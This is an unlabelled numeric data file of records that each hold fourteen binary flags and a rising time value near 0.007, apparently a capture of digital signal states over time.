1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9930680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9931160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9931400e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9931480e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9931880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9932160e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,6.9932200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9932240e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9932680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9932920e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9933160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9933400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9933640e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9933880e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9934160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9934400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9934680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9934920e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9935160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9935400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9935680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9935920e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9936160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9936440e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9936680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9936920e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9937160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9937400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9937680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9937880e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9937960e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9938400e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9938680e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,6.9938720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9938760e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9938920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9939160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9939400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9939680e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9939880e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9940160e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9940200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9940680e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9940920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9941000e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9941160e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9941400e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9941920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9942160e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9942200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9942400e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9942680e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,6.9942720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9942760e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9942920e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9943160e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9943400e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9943680e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9943720e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9944200e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9944440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9944520e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9944680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9944960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9945200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9945480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9945960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9946200e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9946280e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9946440e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9946680e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9946960e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9947200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9947480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9947720e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9947960e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9948200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9948280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9948680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9948960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9949200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9949480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9949720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9949960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9950200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9950440e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9950680e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9950960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9951200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9951480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9951720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9951960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9952200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9952440e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9952720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9952960e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9953000e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9953480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9953720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9953800e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9954200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9954440e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9954520e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9954720e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9954960e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9955200e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9955480e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9955720e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9955960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9956040e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9956440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9956760e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9956960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9957200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9957480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9957720e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9957960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9958200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9958440e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9958720e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9958760e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9959200e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9959480e-03 1,0,1,0,0,1,0,0,0,0,0,0,0,0,6.9959520e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9959560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9959720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9959960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9960200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9960480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9960760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9961000e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9961240e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9961480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9961720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9961960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9962200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9962480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9962520e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9963000e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9963240e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9963320e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9963480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9963720e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9963960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9964200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9964480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9964720e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9964760e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9965240e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9965480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9965560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9965960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9966240e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9966280e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9966480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9966720e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9967000e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9967240e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9967480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9967720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9967800e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9968240e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9968480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9968760e-03 1,0,1,0,0,0,0,0,0,1,0,0,0,0,6.9969000e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9969040e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9969480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9969720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9969800e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9969960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9970200e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9970480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9970720e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9971240e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9971480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9971560e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9971720e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9971960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9972040e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9972200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9972480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9972720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9973000e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9973240e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9973480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9973720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9973960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9974480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9974760e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9975240e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9975480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9975560e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9975960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9976240e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9976480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9976720e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9977000e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9977240e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9977280e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9977720e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9977960e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9978040e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9978480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9978760e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9979000e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9979200e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9979480e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9979720e-03 1,0,1,0,0,1,0,0,0,1,0,0,1,0,6.9979960e-03 1,0,1,0,0,1,0,0,0,1,0,0,0,0,6.9980200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9980280e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9980760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9981000e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9981200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9981480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9981720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9981960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9982200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9982480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9982720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9983000e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9983200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9983480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9983720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9983960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9984200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9984480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9984760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9984960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9985200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9985480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9985720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9985960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9986200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9986480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9986760e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9986960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9987200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9987480e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9987720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9987960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9988200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9988440e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9988720e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9988960e-03 1,0,1,0,0,0,0,0,0,0,0,0,1,0,6.9989200e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,0,6.9989480e-03 1,0,1,0,0,0,0,0,0,0,0,0,0,1,7.1230840e-03 0,0,1,0,0,0,0,0,0,0,0,0,0,1,7.1232680e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,7.1232920e-03 0,1,1,0,0,0,0,0,0,0,0,1,0,1,7.1233200e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,7.1233400e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,1,7.1236520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,7.1236760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,1,7.1237000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,7.1237240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,7.1237280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,1,7.1237480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,7.1237760e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,1,7.1237960e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,7.1238240e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,1,7.1238480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,1,7.1238760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,1,7.1238800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1239160e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1239240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1239480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1239760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1239960e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1240040e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1240240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1240520e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1240760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1241000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1241080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1241240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1241480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1241760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1242000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1242280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1242520e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1242560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1243000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1243240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1243320e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1243480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1243720e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1243800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1244240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1244480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1244560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1244760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1245000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1245240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1245480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1245720e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1245960e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1246240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1246480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1246760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1247000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1247240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1247480e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1247720e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1247960e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1248240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1248480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1248520e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1248760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1249000e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1249240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1249480e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1249720e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1249960e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1250040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1250480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1250760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1251000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1251240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1251480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1251720e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1251960e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1252280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1252520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1252760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1253000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1253240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1253480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1253760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1254000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1254280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1254520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1254760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1255000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1255240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1255320e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1255760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1256000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1256080e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1256280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1256520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1256760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1257000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1257240e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1257480e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1257560e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1258040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1258280e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,7.1258320e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1258360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1258520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1258760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1258800e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1259240e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1259480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1259560e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1259760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1260000e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1260280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1260520e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1260760e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1261040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1261080e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1261560e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1261800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1261880e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1262040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1262280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1262520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1262760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1262840e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1263040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1263280e-03 0,1,1,0,0,1,0,0,0,0,0,0,0,0,7.1263320e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1263360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1263800e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1264040e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1264520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1264760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1265040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1265280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1265560e-03 0,1,1,0,0,0,0,0,0,1,0,0,0,0,7.1265800e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1265840e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1266040e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1266280e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1266360e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1266520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1266760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1267040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1267240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1267520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1267800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1268040e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1268280e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1268520e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1268760e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1269000e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1269240e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1269480e-03 0,1,1,0,0,0,0,0,0,0,0,0,0,0,7.1269800e-03 0,1,1,0,0,0,0,0,0,0,0,0,1,0,7.1270000e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1270280e-03 0,1,1,0,0,1,0,0,0,1,0,0,1,0,7.1270760e-03 0,1,1,0,0,1,0,0,0,1,0,0,0,0,7.1271000e-03 